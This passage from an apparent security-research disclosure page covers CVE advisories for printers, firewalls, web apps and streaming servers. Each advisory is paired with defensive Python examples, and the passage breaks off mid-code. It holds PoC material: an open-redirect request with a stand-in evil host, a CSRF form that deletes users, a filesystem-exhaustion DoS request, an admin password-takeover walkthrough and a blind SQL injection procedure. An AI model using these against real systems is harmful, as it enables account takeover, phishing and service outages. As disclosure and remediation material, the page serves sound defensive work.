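One server-side fix covers the three absolute path traversal issues on this page, the Italtel uploadDir parameter (CVE-2022-39812), the Veritas arbitrary file read (CVE-2022-26484) and the Olivetti failhtmfile crash (CVE-2022-25343): resolve every user-supplied path against a fixed base directory and reject anything that lands outside it, and turn a missing file into an error response instead of a service-wide failure. The Python example below is added here and is not code from any of the affected products; the base directories are the ones quoted in the Italtel PoC, while the in-memory file table, handler names and status codes are constructed for illustration.

```python
import posixpath
from typing import Dict, Tuple


class PathTraversalError(ValueError):
    """Raised when a requested path would land outside the allowed base directory."""


def safe_join(base_dir: str, user_path: str) -> str:
    """Return the normalized absolute path of user_path inside base_dir.

    posixpath.join() discards base_dir when user_path is absolute (the CWE-36
    case) and ".." segments walk upwards, so the check is made on the
    normalized result, not on the input string.
    """
    if not base_dir.startswith("/"):
        raise ValueError("base_dir must be absolute")
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, user_path))
    # The trailing "/" stops /var/tmp/external2 from passing as /var/tmp/external.
    if candidate != base and not candidate.startswith(base + "/"):
        raise PathTraversalError(f"{user_path!r} escapes {base_dir!r}")
    return candidate


def is_within(base_dir: str, user_path: str) -> bool:
    """Boolean form of safe_join for callers that only need a yes/no answer."""
    try:
        safe_join(base_dir, user_path)
        return True
    except PathTraversalError:
        return False


def resolve_upload_dir(requested: str, base_dir: str = "/var/tmp/external/") -> str:
    """Server-side replacement for trusting the uploadDir form field as sent:
    the PoC's /home/oam/ is rejected instead of becoming the upload target."""
    return safe_join(base_dir, requested)


# Constructed in-memory file table standing in for a web root (hypothetical).
FILES: Dict[str, bytes] = {
    "/srv/www/index.html": b"<html>ok</html>",
    "/srv/www/err/fail.htm": b"<html>failure page</html>",
}


def serve_file(requested: str, base_dir: str = "/srv/www", files: Dict[str, bytes] = FILES) -> Tuple[int, bytes]:
    """Return (status, body) for a file request and never crash on a bad path.

    A traversal attempt becomes 400 and a file that does not exist (the
    failhtmfile case) becomes 404; neither leaves the application in a broken
    state for the requests that follow.
    """
    try:
        path = safe_join(base_dir, requested)
    except PathTraversalError:
        return 400, b"invalid path"
    body = files.get(path)
    if body is None:
        return 404, b"not found"
    return 200, body


if __name__ == "__main__":
    print(resolve_upload_dir("reports"))                  # /var/tmp/external/reports
    print(is_within("/var/tmp/external/", "/home/oam/"))  # False
    print(serve_file("err/../../../etc/passwd"))          # (400, b'invalid path')
```

On a real filesystem the same check should be applied after os.path.realpath() as well, so that a symbolic link inside the base directory cannot point back out of it.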
Vulnerability Description: CWE-284: Improper Access Control
Software Version: Firmware 2XD_S000.002.271
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-25342
CVSv3: 8.1
Severity: High
Credits: Vincenzo Nigro, Massimiliano Brolli
An issue was discovered on Olivetti d-COLOR MF3555 2XD_S000.002.271 devices. The Web Application is affected by Broken Access Control. It does not properly validate requests for access to data and functionality under the /mngset/authset path. By not verifying permissions for access to resources, it allows a potential attacker to view pages that are not allowed.
NOTE: This vulnerability has been fixed in the available firmware version 2XD_S000.002.703 from January 17th, 2022 and later versions.
Step-by-step instructions and PoC
If you have access to the credentials of a (non-administrator) user with at least one system administrator permission (as shown in Figure 1), it is possible to modify the details of any user, even an administrator, including the password. The following figure shows the permissions of the testpt user.
Figure 1: Permission needed to reproduce the attack
Once logged in as the testpt user, click on “Impostazioni di gestione” and then on “Riavvio/Reset” while intercepting the request with Burp Suite.
Figure 2: Panel of testpt user
Figure 3: HTTP request intercepted when clicking on “Riavvio/Reset”
At this point, by substituting the following URL it is possible to open the admin panel with all the users of the system:
Figure 4: Admin panel with all user settings, from the unprivileged account testpt
By clicking on any user, the properties panel comes up, where that user's information, including the password, can be edited.
Figure 5: Properties panel of user Admin, from the unprivileged account testpt
By clicking “Invia”, a POST request is made and the user's password is modified.
Figure 6: POST request to change Admin password
In this way it is possible to log in as the Admin user with the new password and then create new accounts or edit all kinds of settings.
Vulnerability Description: Stored Cross-Site Scripting - CWE-79
Software Version: FortiOS version 7.2.0, version 6.4.0 through 6.4.9, version 7.0.0 through 7.0.5
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-43080
CVSv3: 5.4
Severity: Medium
Credits: Massimiliano Ferraresi, Massimiliano Brolli
An improper neutralization of input during web page generation vulnerability [CWE-79] in FortiOS version 7.2.0, version 6.4.0 through 6.4.9, version 7.0.0 through 7.0.5 may allow an authenticated attacker to perform a stored cross site scripting (XSS) attack through the URI parameter via the Threat Feed IP address section of the Security Fabric External connectors.
Affected Endpoints
· URL: https://x.x.x.x/api/v2/monitor/system/external-resource/entry-list?mkey=
Step-by-step instructions and PoC
An attacker has to create a malicious HTTP server reachable from the FortiGate; in this case we created an HTTP server with a malicious list of XSS payloads (e.g. xss2.txt):
Figure 1: HTTP server with XSS payload
An attacker has to add an external “IP Address” connector from these fields:
· Security Fabric > External Connectors > Create New > IP Address
Figure 2: External Connectors page
In the “name” and “comment” fields we wrote arbitrary values, disabled HTTP basic authentication, and in the “URI of external resource” field we inserted the address of our web server with the path of the XSS payloads:
Figure 3: Configuring the remote address
Click on “OK” and save the settings; after 5 minutes the FortiGate will contact the server and parse our file:
Figure 4: FortiGate parses the xss2.txt file
Now click on the “View Entries” tab:
Figure 5: View invalid entries
And the malicious XSS payloads (JavaScript code) will run correctly:
Figure 6: JavaScript alert
Vulnerability Description: Multiple Stored Cross-Site Scripting - CWE-79
Software Version: 21.3.3.815
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-41555
CVSv3: 6.1
Severity: Medium
Credits: Luca Carbone, Mattia Campanelli, Alessandro Sabetta, Massimiliano Brolli
** UNSUPPORTED WHEN ASSIGNED **
In ARCHIBUS Web Central 21.3.3.815 (a version from 2014), XSS occurs in /archibus/dwr/call/plaincall/workflow.runWorkflowRule.dwr because the data received as input from clients is re-included within the HTTP response returned by the application without adequate validation. In this way, if HTML code or client-side executable code (e.g., Javascript) is entered as input, the expected execution flow could be altered. This is fixed in all recent versions, such as version 26.
NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Version 21.3 was officially de-supported by the end of 2020.
Vulnerability Description: Multiple Broken Access Control – CWE-284
Software Version: 21.3.3.815
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-41554
CVSv3: 8.8
Severity: High
Credits: Luca Carbone, Mattia Campanelli, Alessandro Sabetta, Massimiliano Brolli
** UNSUPPORTED WHEN ASSIGNED **
ARCHIBUS Web Central 21.3.3.815 (a version from 2014) does not properly validate requests for access to data and functionality in these affected endpoints:
/archibus/schema/ab-edit-users.axvw, /archibus/schema/ab-data-dictionary-table.axvw, /archibus/schema/ab-schema-add-field.axvw, /archibus/schema/ab-core/views/process-navigator/ab-my-user-profile.axvw. By not verifying the permissions for access to resources, it allows a potential attacker to view pages that are not allowed. Specifically, it was found that any authenticated user can reach the administrative console for user management by directly requesting access to the page via URL. This allows a malicious user to modify all users' profiles, to elevate any privileges to administrative ones, or to create or delete any type of user. It is also possible to modify the emails of other users, through a misconfiguration of the username parameter, on the user profile page. This is fixed in all recent versions, such as version 26.
NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Version 21.3 was officially de-supported by the end of 2020.
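The access control entries on this page (Italtel NetMatch-S, Nokia AirFrame BMC, Olivetti d-COLOR and ARCHIBUS Web Central) share one root cause: the server either does not check the caller's role for a given endpoint or relies on the client to hide a link or disable a control. The Python example below is added here and is not code from any of those products; it shows a route table in which every handler declares the minimum role it needs, a dispatcher that refuses anything not in the table, and an audit helper that lists handlers registered without a role. Role names, endpoint names and the session shape are assumptions for illustration.

```python
from functools import wraps
from typing import Callable, Dict, List, Optional, Tuple

# Hypothetical role hierarchy, lowest to highest privilege.
ROLE_RANK = {"operator": 1, "administrator": 2, "system_administrator": 3}

HANDLERS: Dict[str, Callable] = {}        # endpoint -> handler
REQUIRED_ROLE: Dict[str, str] = {}        # endpoint -> minimum role


def route(endpoint: str, minimum_role: str):
    """Register a handler together with its minimum role. There is no way to
    register a handler without one, so no endpoint is unprotected by accident."""
    if minimum_role not in ROLE_RANK:
        raise ValueError(f"unknown role {minimum_role!r}")

    def decorator(fn):
        @wraps(fn)
        def wrapper(session: Optional[dict], *args):
            role = (session or {}).get("role")
            if role is None:
                return 401, "authentication required"
            if ROLE_RANK.get(role, 0) < ROLE_RANK[minimum_role]:
                # Decided here, on the server, whatever the client-side page
                # chose to show, hide or mark as disabled.
                return 403, f"{endpoint} requires {minimum_role}"
            return 200, fn(session, *args)
        HANDLERS[endpoint] = wrapper
        REQUIRED_ROLE[endpoint] = minimum_role
        return wrapper
    return decorator


def dispatch(endpoint: str, session: Optional[dict], *args) -> Tuple[int, object]:
    """Unknown endpoints are denied rather than served as if they were public."""
    handler = HANDLERS.get(endpoint)
    if handler is None:
        return 404, "no such endpoint"
    return handler(session, *args)


def unprotected_endpoints() -> List[str]:
    """Audit helper: endpoints that are served without an entry in REQUIRED_ROLE."""
    return sorted(set(HANDLERS) - set(REQUIRED_ROLE))


# Constructed endpoints modelled loosely on the ones named in the advisories.
@route("advanced-settings", "system_administrator")
def advanced_settings(session):
    return "advanced settings page"


@route("save-file-uploader", "administrator")
def save_file_uploader(session, file_name):
    return f"stored {file_name} for {session['user']}"


@route("settings/redundancy", "system_administrator")
def redundancy_update(session, enabled):
    return {"redundancy": bool(enabled)}


@route("user-profile", "operator")
def my_profile(session):
    return {"user": session["user"], "role": session["role"]}


if __name__ == "__main__":
    admin = {"user": "alice", "role": "administrator"}
    print(dispatch("advanced-settings", admin))           # (403, ...)
    print(dispatch("save-file-uploader", None, "a.txt"))  # (401, ...)
```

The audit helper is the part worth running in CI: the ARCHIBUS and AirFrame findings are exactly the case where a handler exists but no role was ever attached to it, and a test that asserts unprotected_endpoints() is empty catches that before release.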
Vulnerability Description: Multiple User Session Vulnerabilities - CWE-1018
Software Version: 21.3.3.815
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-41553
CVSv3: 9.8
Severity: Critical
Credits: Luca Carbone, Mattia Campanelli, Alessandro Sabetta, Massimiliano Brolli
** UNSUPPORTED WHEN ASSIGNED **
In ARCHIBUS Web Central 21.3.3.815 (a version from 2014), the Web Application in /archibus/login.axvw assigns a session token that could already be in use by another user. It was therefore possible to access the application as a user whose credentials were not known, without any attempt by the testers to modify the application logic. It is also possible to set the value of the session token client-side, simply by making an unauthenticated GET request to the Home Page and adding an arbitrary value to the JSESSIONID field. The application, following the login, does not assign a new token and keeps the inserted one as the identifier of the entire session. This is fixed in all recent versions, such as version 26.
NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Version 21.3 was officially de-supported by the end of 2020.
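The session handling described for /archibus/login.axvw fails in two ways: it keeps whatever JSESSIONID the client presented, and the identifiers it issues can collide. The remedy is to accept only server-issued tokens, draw them from a CSPRNG wide enough that collisions are not a concern, and replace the token at the moment of authentication. The Python example below is added here and is not ARCHIBUS code; the in-memory store, the user table and the password check are constructed for illustration (a real deployment stores password hashes, not the value shown).

```python
import hmac
import secrets
from typing import Dict, Optional

# Constructed credential table; a real system keeps salted hashes, never this.
USERS: Dict[str, str] = {"alice": "correct-horse-battery"}


def verify_password(username: str, password: str) -> bool:
    return hmac.compare_digest(USERS.get(username, ""), password)


class SessionStore:
    """Server-side sessions keyed by a 256-bit random token."""

    def __init__(self) -> None:
        self._sessions: Dict[str, dict] = {}

    def _new_token(self) -> str:
        return secrets.token_urlsafe(32)

    def start(self) -> str:
        """Pre-authentication session for an unauthenticated visitor."""
        token = self._new_token()
        self._sessions[token] = {"user": None}
        return token

    def lookup(self, token: Optional[str]) -> Optional[dict]:
        """Only tokens the server issued resolve. A client-chosen value is simply
        unknown, so presenting it cannot turn it into a session."""
        if not token:
            return None
        return self._sessions.get(token)

    def login(self, presented_token: Optional[str], username: str, password: str) -> Optional[str]:
        """Authenticate and return a fresh token; the presented one is retired.

        Whatever the client sent before login, fixed by an attacker, guessed, or
        merely stale, is never upgraded into an authenticated session.
        """
        if not verify_password(username, password):
            return None
        if presented_token:
            self._sessions.pop(presented_token, None)
        token = self._new_token()
        self._sessions[token] = {"user": username}
        return token

    def logout(self, token: str) -> None:
        self._sessions.pop(token, None)

    def active_count(self) -> int:
        return len(self._sessions)


if __name__ == "__main__":
    store = SessionStore()
    pre = store.start()
    post = store.login(pre, "alice", "correct-horse-battery")
    print(pre != post, store.lookup(pre), store.lookup(post))
```

The cookie carrying the token should be set with HttpOnly, Secure and SameSite attributes on top of this; those do not replace the regeneration at login, which is the control the advisory's second paragraph is missing.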
Vulnerability Description: Open Redirect - CWE-601
Software Version: <= 2019.05
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-38123
CVSv3: 6.1
Severity: Medium
Credits: Veno Eivazian, Massimiliano Brolli
The Host HTTP parameter could cause the web application to redirect to the specified URL, when the requested endpoint is '/device.save.do'. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.
The application presents an Open Redirect on the Host parameter, when the /device.save.do endpoint is requested via an HTTP POST request.
To exploit the vulnerability, the following HTTP request is used:
POST /device.save.do HTTP/1.1
Host: this.is.my.domain.evil.net
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Origin: https://hostname
Connection: close
Referer: https://hostname/device.edit.do?deviceID=201
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
An attacker can send a link containing JavaScript code that causes a user who runs the code to be automatically redirected to a domain owned by the attacker.
The redirect is performed via the HTTP Location response header.
Figure 1: Open Redirect
The victim is thus redirected to a malicious domain:
Figure 2: Open Redirect
To perform this attack, the user does not need to be authenticated to the target application.
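A Host header is client-controlled, so a redirect built from it is an open redirect by construction. The server-side fix is to issue a relative Location, or, where an absolute URL is required, to take the host from a configured allowlist rather than from the request. The Python example below is added here and is not code from the affected product; the allowlisted host names and the sample paths are constructed for illustration.

```python
from typing import Optional, Set
from urllib.parse import urlsplit

# Constructed deployment configuration: the names this application answers to.
ALLOWED_HOSTS: Set[str] = {"hostname", "hostname:8443"}


def is_allowed_host(request_host: Optional[str]) -> bool:
    """True only for a Host value that is on the configured allowlist."""
    if not request_host:
        return False
    return request_host.strip().lower() in ALLOWED_HOSTS


def is_local_path(path: str) -> bool:
    """A redirect target that can only stay on this site.

    Rejects scheme-relative URLs (//evil.example), absolute URLs and backslash
    variants, which browsers normalize to a slash.
    """
    if not path.startswith("/") or path.startswith("//") or "\\" in path:
        return False
    parts = urlsplit(path)
    return parts.scheme == "" and parts.netloc == ""


def redirect_location(path: str) -> Optional[str]:
    """Preferred form: a relative Location, which involves no host at all."""
    return path if is_local_path(path) else None


def absolute_redirect_location(request_host: Optional[str], path: str) -> Optional[str]:
    """When an absolute Location is unavoidable, the host is accepted only from
    the allowlist, never straight from the header; None means refuse."""
    if not is_allowed_host(request_host) or not is_local_path(path):
        return None
    return f"https://{request_host.strip().lower()}{path}"


if __name__ == "__main__":
    print(absolute_redirect_location("this.is.my.domain.evil.net", "/device.edit.do?deviceID=201"))  # None
    print(absolute_redirect_location("hostname", "/device.edit.do?deviceID=201"))
    print(redirect_location("/device.edit.do?deviceID=201"))
```

Most web frameworks expose the same idea as an allowed-hosts setting; the point of the example is that the value in Location must come from that setting and not from the Host, Referer or any other request header.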
Vulnerability Description: Missing Authentication for Critical Function - CWE-306
Software Version: Johnson Controls Metasys MREWeb Service 9.0.0.4256
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-36200
CVSv3: 5.3
Severity: Medium
Credits: Alessandro Bosco, Luca Di Giuseppe, Stefano Scipioni, Massimiliano Brolli
Under certain circumstances an unauthenticated user could access the web API for Metasys ADS/ADX/OAS 10 versions prior to 10.1.6 and 11 versions prior to 11.0.2 and enumerate users.
Vulnerability Description: Uncontrolled Resource Consumption – CWE-400
Software Version: <= 4.8.11+5
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-35492
CVSv3: 6.5
Severity: Medium
Credits: Veno Eivazian, Massimiliano Brolli
A remote user, authenticated to the Wowza Streaming Engine web interface, could exhaust filesystem resources through the Virtual Host Monitoring section, resulting in a denial of service (DoS) condition on the affected application. This vulnerability is due to insufficient management of available filesystem resources. An attacker could exploit this vulnerability by requesting historical data for random virtual hosts until the available filesystem resources are exhausted. A successful exploit could allow the attacker to cause database errors and make the device unresponsive to web-based management. Manual intervention is required to free filesystem resources and return the application to an operational state.
To exploit the vulnerability, intercept the browser session with a proxy like Burp Suite.
Then, go to the Virtual Host Monitoring section:
Figure 1: DoS - Virtual Host Monitoring - Web Interface
An HTTP request will be automatically performed to view the historical data of the default virtual host.
The request, as seen in Burp Suite, will look like the following screenshot.
Figure 2: DoS - Regular HTTP request
Every time virtual host monitoring data is requested, a new file is created or appended on the filesystem.
By default, this is the starting condition on the folder /usr/local/WowzaStreamingEngine-4.8.11+5/stats/:
Figure 3: DoS - Filesystem on normal condition
The attack can be performed with Burp Repeater, reusing the request captured with the proxy and changing only the value of the vhost parameter. The response will be HTTP 200 OK:
Figure 4: DoS - New virtual host HTTP request
Alternatively, the same can be achieved with the following payload:
GET /enginemanager/server/vhost/historical.jsdata?vhost=_defaultVHost_pippo_&periodStart=2021-06-03T13%3A47%3A44%2B02%3A00&periodEnd=2021-06-03T14%3A47%3A44%2B02%3A00&_=1622724285834 HTTP/1.1
Host: wse.local:8088
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://wse.local:8088/enginemanager/Home.htm
Cookie: JSESSIONID=E1EC2C1050D74EB0E4DA9474789E8F5E; lastMangerHost=http%3A//127.0.0.1%3A8087; showRightRail=true; DoNotShowFTU=false; lastTab=Basic
On the filesystem side, a new file of 280 KB will be created, as depicted by the following screenshot:
Figure 5: DoS - New virtual host file on the filesystem
To exploit this condition at scale, multiple requests with different vhost values have to be sent.
To send those requests reliably, the browser session has to be kept active.
Session timeout can be prevented by installing a browser plugin such as Tab Reloader and configuring it to refresh the tab every minute, as in the following example:
Figure 6: DoS - Session timeout prevention - Tab Reloader
Then it is possible to create a custom script to randomize the vhost parameter to a new value to be sent every time.
./dos-exploit-wse.py
When running this tool, it is possible to exhaust the filesystem by creating 5.5 GB of files every 30 minutes.
The effect is summarized in the following screenshot, which shows the multiple files created on the filesystem and the growth of the stats directory after 30 minutes of tool execution:
Figure 7: DoS - DoS exploit effect
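Since every request for an unknown vhost leaves a file behind, the abuse is visible in the Engine Manager access log as one client cycling through many vhost names that are not configured on the server. The following added detection example is not part of the original advisory; the log format, CONFIGURED_VHOSTS and the threshold are constructed for the illustration.

```python
"""Added detection example: flag clients requesting historical data for
many distinct, non-configured vhost names. Log lines are constructed."""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

CONFIGURED_VHOSTS = {"_defaultVHost_"}   # constructed; in practice read from the server's vhost config
DISTINCT_VHOST_THRESHOLD = 5             # constructed tuning value

HIST = "/enginemanager/server/vhost/historical.jsdata"
# Constructed access-log sample: a legitimate client (10.0.0.7), a single typo
# (10.0.0.8) and a client cycling through invented vhost names (10.0.0.9).
SAMPLE_LOG = "\n".join([
    f'10.0.0.7 - admin [03/Jun/2021:13:47:44 +0200] "GET {HIST}?vhost=_defaultVHost_&periodStart=x&periodEnd=y HTTP/1.1" 200 2811',
    f'10.0.0.8 - admin [03/Jun/2021:13:47:48 +0200] "GET {HIST}?vhost=_defaultVhost_&periodStart=x&periodEnd=y HTTP/1.1" 200 2811',
    f'10.0.0.9 - admin [03/Jun/2021:13:47:50 +0200] "GET {HIST}?vhost=_defaultVHost_pippo_&periodStart=x&periodEnd=y HTTP/1.1" 200 2811',
    f'10.0.0.9 - admin [03/Jun/2021:13:47:51 +0200] "GET {HIST}?vhost=_defaultVHost_a1b2&periodStart=x&periodEnd=y HTTP/1.1" 200 2811',
    f'10.0.0.9 - admin [03/Jun/2021:13:47:52 +0200] "GET {HIST}?vhost=_defaultVHost_c3d4&periodStart=x&periodEnd=y HTTP/1.1" 200 2811',
    f'10.0.0.9 - admin [03/Jun/2021:13:47:53 +0200] "GET {HIST}?vhost=_defaultVHost_e5f6&periodStart=x&periodEnd=y HTTP/1.1" 200 2811',
    f'10.0.0.9 - admin [03/Jun/2021:13:47:54 +0200] "GET {HIST}?vhost=_defaultVHost_g7h8&periodStart=x&periodEnd=y HTTP/1.1" 200 2811',
    f'10.0.0.9 - admin [03/Jun/2021:13:47:55 +0200] "GET {HIST}?vhost=_defaultVHost_i9j0&periodStart=x&periodEnd=y HTTP/1.1" 200 2811',
    f'10.0.0.9 - admin [03/Jun/2021:13:47:56 +0200] "GET /enginemanager/Home.htm HTTP/1.1" 200 5120',
])

# Common log format: client, ident, user, [timestamp], "METHOD target proto", status
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_vhost_requests(log_text):
    """Yield (ip, user, vhost, status) for every request to the history endpoint."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if parts.path != HIST:
            continue
        vhost = parse_qs(parts.query).get("vhost", [""])[0]
        yield m["ip"], m["user"], vhost, int(m["status"])


def find_vhost_abuse(log_text, configured=CONFIGURED_VHOSTS,
                     threshold=DISTINCT_VHOST_THRESHOLD):
    """Return {ip: sorted unknown vhost names} for clients whose distinct,
    non-configured vhost names answered with 200 reach the threshold.
    Only 200s count: those are the requests that created a file."""
    unknown = defaultdict(set)
    for ip, _user, vhost, status in parse_vhost_requests(log_text):
        if status == 200 and vhost not in configured:
            unknown[ip].add(vhost)
    return {ip: sorted(names) for ip, names in unknown.items()
            if len(names) >= threshold}
```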
Vulnerability Description: Cross-Site Request Forgery (CSRF) - CWE-352
Software Version: <= 4.8.11+5
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-35491
CVSv3: 8.1
Severity: High
Credits: Veno Eivazian, Massimiliano Brolli
A remote attacker is able to delete a user without the victim's knowledge, by enticing an authenticated admin user to visit an attacker's web page. The application does not implement a CSRF token for the GET request. An attacker can craft an HTML page with a forged request on /enginemanager/server/user/delete.htm URL and send it to the victim.
Prerequisites: None.
Step-by-step instructions and PoC
An authenticated user that visits a crafted HTML page with a forged request can delete a user on Wowza Streaming Engine on behalf of an administrator.
To exploit the vulnerability, a new user needs to be created for testing purposes.
First, create a new user from Server -> Users -> Add User.
Figure 1: CSRF - User creation
Then, save the following HTML to a file served from another machine (in this case a local Kali Linux box), at /var/www/html/csrf-delete-user.html:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://wse.local:8088/enginemanager/server/user/delete.htm">
<input type="hidden" name="userName" value="pippo" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Enable the local web server on the attacker machine:
sudo /etc/init.d/apache2 start
From an authenticated browser session to Wowza Streaming Engine with administrative privileges, open a new tab and go to the page http://127.0.0.1/csrf-delete-user.html.
Figure 2: CSRF - PoC HTML page
Select Submit request, to force the administrator to delete the selected user.
The request will be sent to the web application, and the user will be deleted:
Figure 3: CSRF - User deleted
It was also found that the wowzaSecurityToken HTTP parameter is not present in this GET request. In this case, the application accepts the request and processes it every time.
This is not true in the case of user creation, where that parameter is present and correctly validated.
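The two observations above (a state change on a bare GET, and the wowzaSecurityToken validated on creation but absent on deletion) are what the fix has to address. The following added example is not code from the original advisory or from the product: it places the unprotected delete handler beside one that requires a POST carrying the per-session token, compared in constant time. The in-memory user and session stores are constructed.

```python
"""Added example: GET delete without CSRF token beside a POST-only,
token-checked handler. Session and user stores are constructed."""
import hmac
import secrets


def new_session(user="admin"):
    """Constructed session record; the token is minted once per login and
    must be carried by every state-changing request of that session."""
    return {"user": user, "csrf_token": secrets.token_hex(16)}


def vulnerable_delete_user(users, session, method, params):
    """Mirrors CVE-2021-35491: any request reaching
    /enginemanager/server/user/delete.htm with a valid session cookie is
    honoured, whatever the method, and no wowzaSecurityToken is required.
    A cross-site <form> GET therefore succeeds with the victim's cookie."""
    name = params.get("userName")
    if name in users:
        del users[name]
        return 200
    return 404


def hardened_delete_user(users, session, method, params):
    """State change only over POST, and only with the session's token."""
    if method != "POST":
        return 405   # a forged GET (link, <img>, GET <form>) dies here
    supplied = params.get("wowzaSecurityToken", "")
    expected = session["csrf_token"]
    # compare_digest on bytes: constant time, and no TypeError on odd input
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return 403   # cross-site page cannot read the victim's token
    name = params.get("userName")
    if name in users:
        del users[name]
        return 200
    return 404
```

Marking the session cookie SameSite=Lax or Strict blocks the cross-site GET as well, but the token check is what makes the endpoint safe regardless of browser behaviour.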
Vulnerability Description: Stored Cross-Site Scripting - CWE-79
Software Version: <= 2.44
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-35490
CVSv3: 5.4
Severity: Medium
Credits: Mattia Campanelli, Alessandro Bosco, Alessandro Sabetta, Massimiliano Brolli
Thruk versions 2.44 and previous allow Stored XSS on a specific parameter. A malicious user leveraging this vulnerability could inject arbitrary JavaScript. The malicious payload will then be triggered every time an authenticated user browses the page containing it.
Vulnerability Description: Reflected Cross-Site Scripting - CWE-79
Software Version: <= 2.40-2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-35489
CVSv3: 6.1
Severity: Medium
Credits: Mattia Campanelli, Alessandro Bosco, Alessandro Sabetta, Massimiliano Brolli
Thruk version 2.40-2 allows /thruk/#cgi-bin/extinfo.cgi?type=2&host=[HOSTNAME]&service=[SERVICENAME]&backend=[BACKEND] Reflected XSS on 'host' and 'service' parameters. A malicious user leveraging this vulnerability could inject arbitrary JavaScript into extinfo.cgi. The malicious payload will then be triggered every time an authenticated user browses the page containing it.
The vulnerable functionality can be reached through the following URL:
A PoC is possible by inserting the malicious payload in either the host or the service field (GET request):
This occurs due to the closure of a comment, as demonstrated in the next screenshot.
Figure 1: Reflected XSS on extinfo.cgi – Payload 1
Some other screenshots demonstrating the vulnerability:
Figure 2: Reflected XSS on extinfo.cgi – Payload 2
Figure 3: Reflected XSS on extinfo.cgi – Payload 3
Figure 4: Reflected XSS on extinfo.cgi – Payload 4
Vulnerability Description: Reflected Cross-Site Scripting - CWE-79
Software Version: <= 2.40-2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-35488
CVSv3: 6.1
Severity: Medium
Credits: Mattia Campanelli, Alessandro Bosco, Alessandro Sabetta, Massimiliano Brolli
Thruk version 2.40-2 allows /thruk/#cgi-bin/status.cgi?style=combined&title=[TITLE] Reflected XSS on 'host' and 'title' parameters. A malicious user leveraging this vulnerability could inject arbitrary JavaScript into status.cgi. The malicious payload will then be triggered every time an authenticated user browses the page containing it.
The vulnerable functionality can be reached through the following URLs:
A PoC is possible by inserting the malicious payload in either the host or the title field (GET request):
This occurs due to the closure of a comment, as demonstrated in the next screenshot.
Figure 1: Reflected XSS on status.cgi – Payload 1
Vulnerability Description: Boolean Blind SQL Injection - CWE-89
Software Version: <= 11.1.0
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-35487
CVSv3: 6.5
Severity: Medium
Credits: Marco Raimondi, Francesco Pigini, Massimiliano Brolli
A remote user, authenticated on the Broadcast Message Center, can navigate the application in the ALERTS --> Manage Alerts section. Within Search Options it is possible to select Basic Search and by specifying the extIdentifier parameter, arbitrary queries in the application database can be executed.
Through these queries it is possible to extract arbitrary information not foreseen by the application logic, such as the system user that executes the queries, the DBMS version, and so on.
Depending on the permissions the user has on the database, different types of queries are possible and consequently different types of information can be extracted.
Payload used to exploit the vulnerability:
Figure 0: Payload
The first step consisted of inserting a single quote (') in the search bar, in order to evaluate the behavior of the application. The result was a database error message:
Figure 1: Single quote database error message
At this point we tried to see if it was possible to execute arbitrary queries on the application. In this specific case, we tried to get the name of the user who executes the queries on the database. To do this we combined the mid() and user() functions. Being a Blind SQL Injection, if the query result was "true" we would get all the database alerts, otherwise we would get nothing, and we would have to go on with the letters of the alphabet:
Figure 2: True query request
Figure 3: True query page behavior with alarms
The result of the query is the entire list of alarms, so the first letter of the username is after "m" in the alphabet.
Figure 4: False query page behavior
Using the letter "n" we get nothing. Therefore, the first letter of the username is "n". Proceeding in this way it is possible to obtain the full name of the user.
At this point we try to confirm the username found by using the user() function directly:
Figure 5: User() function true request
Figure 6: User() function true response page
As we can see from the last image, using only the user() function with the name found from the previous steps, we get again the complete list of alarms, confirming that the username is correct.
Similarly, it is possible to proceed to get more information from the database.
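The oracle used above (a true condition returns every alert, a false one returns nothing, a lone quote returns a DBMS error) exists only because the extIdentifier value is concatenated into the statement. The following added example is not code from the original advisory or from the product: it shows that construction beside the parameterized form, with SQLite standing in for the product's DBMS and a constructed alerts table.

```python
"""Added example: Basic Search on extIdentifier built by concatenation
beside the parameterized query. Schema and rows are constructed."""
import sqlite3


def make_db():
    """Constructed alerts table standing in for the Broadcast Message Center DB."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE alerts (id INTEGER PRIMARY KEY, ext_identifier TEXT, message TEXT)"
    )
    con.executemany(
        "INSERT INTO alerts (ext_identifier, message) VALUES (?, ?)",
        [("EXT-001", "link down"), ("EXT-002", "cpu high"), ("EXT-003", "disk full")],
    )
    return con


def vulnerable_search(con, ext_identifier):
    """Mirrors the flaw: the search value becomes part of the SQL text, so a
    quote ends the literal and whatever follows is evaluated as SQL. A
    condition that is true for every row returns the whole alert list,
    which is the boolean oracle the write-up walks through."""
    sql = (
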